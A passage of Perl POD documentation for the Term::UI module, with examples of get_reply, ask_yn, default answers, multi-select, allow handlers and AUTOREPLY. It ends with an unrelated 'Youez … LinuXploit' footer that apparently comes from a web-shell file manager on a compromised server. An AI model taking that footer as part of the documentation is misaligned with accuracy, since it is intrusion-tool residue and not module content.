      1> red
      2> green
      3> blue

    Your favourite colour?

C<$reply> will hold one of the choices presented. C<Term::UI> will repose
the question if the user attempts to enter an answer that's not in the
list of choices. The string presented is held in the C<$Term::UI::INVALID>
variable (see the C<GLOBAL VARIABLES> section for details.

=head2 get_reply with choices and default

    ### provide a sensible default option -- everyone loves blue!
    $reply = $term->get_reply(
                prompt  => 'Your favourite colour?',
                choices => [qw|red green blue|],
                default => 'blue' );

which would look like:

      1> red
      2> green
      3> blue

    Your favourite colour? [3]:

Note the default answer after the prompt. A user can now just hit C<enter>
(or set C<$Term::UI::AUTOREPLY> -- see the C<GLOBAL VARIABLES> section) and
the sensible answer 'blue' will be returned.

=head2 get_reply using print_me & multi

    ### allow the user to pick more than one colour and add an
    ### introduction text
    @reply = $term->get_reply(
                print_me    => 'Tell us what colours you like',
                prompt      => 'Your favourite colours?',
                choices     => [qw|red green blue|],
                multi       => 1 );

which would look like:

    Tell us what colours you like
      1> red
      2> green
      3> blue

    Your favourite colours?

An answer of C<3 2 1> would fill C<@reply> with C<blue green red>

=head2 get_reply & allow

    ### pose an open question, but do a custom verification on
    ### the answer, which will only exit the question loop, if
    ### the answer matches the allow handler.
    $reply = $term->get_reply(
                prompt  => "What is the magic number?",
                allow   => 42 );

Unless the user now enters C<42>, the question will be reposed over
and over again. You can use more sophisticated C<allow> handlers (even
subroutines can be used). The C<allow> handler is implemented using
C<Params::Check>'s C<allow> function. Check its manpage for details.

=head2 an elaborate ask_yn sample

    ### ask a user if he likes cookies. Default to a sensible 'yes'
    ### and inform him first what cookies are.
    $bool = $term->ask_yn( prompt   => 'Do you like cookies?',
                           default  => 'y',
                           print_me => 'Cookies are LOVELY!!!' );

would print:

    Cookies are LOVELY!!!
    Do you like cookies? [Y/n]:

If a user then simply hits C<enter>, agreeing with the default,
C<$bool> would be set to C<true>. (Simply hitting 'y' would also
return C<true>. Hitting 'n' would return C<false>)

We could later retrieve this interaction by printing out the Q&A
history as follows:

    print $term->history_as_string;

which would then print:

    Cookies are LOVELY!!!
    Do you like cookies? [Y/n]:  y

There's a chance we're doing this non-interactively, because a console
is missing, the user indicated he just wanted the defaults, etc.

In this case, simply setting C<$Term::UI::AUTOREPLY> to true, will
return from every question with the default answer set for the question.
Do note that if C<AUTOREPLY> is true, and no default is set, C<Term::UI>
will warn about this and return C<undef>.

=head1 See Also

C<Params::Check>, C<Term::ReadLine>, C<Term::UI::History>

=head1 BUG REPORTS

Please report bugs or other issues to E<lt>bug-term-ui@rt.cpan.org<gt>.

=head1 AUTHOR

This module by Jos Boumans E<lt>kane@cpan.orgE<gt>.

=head1 COPYRIGHT

This library is free software; you may redistribute and/or modify it
under the same terms as Perl itself.

=cut

Youez - 2016 - github.com/yon3zu
LinuXploit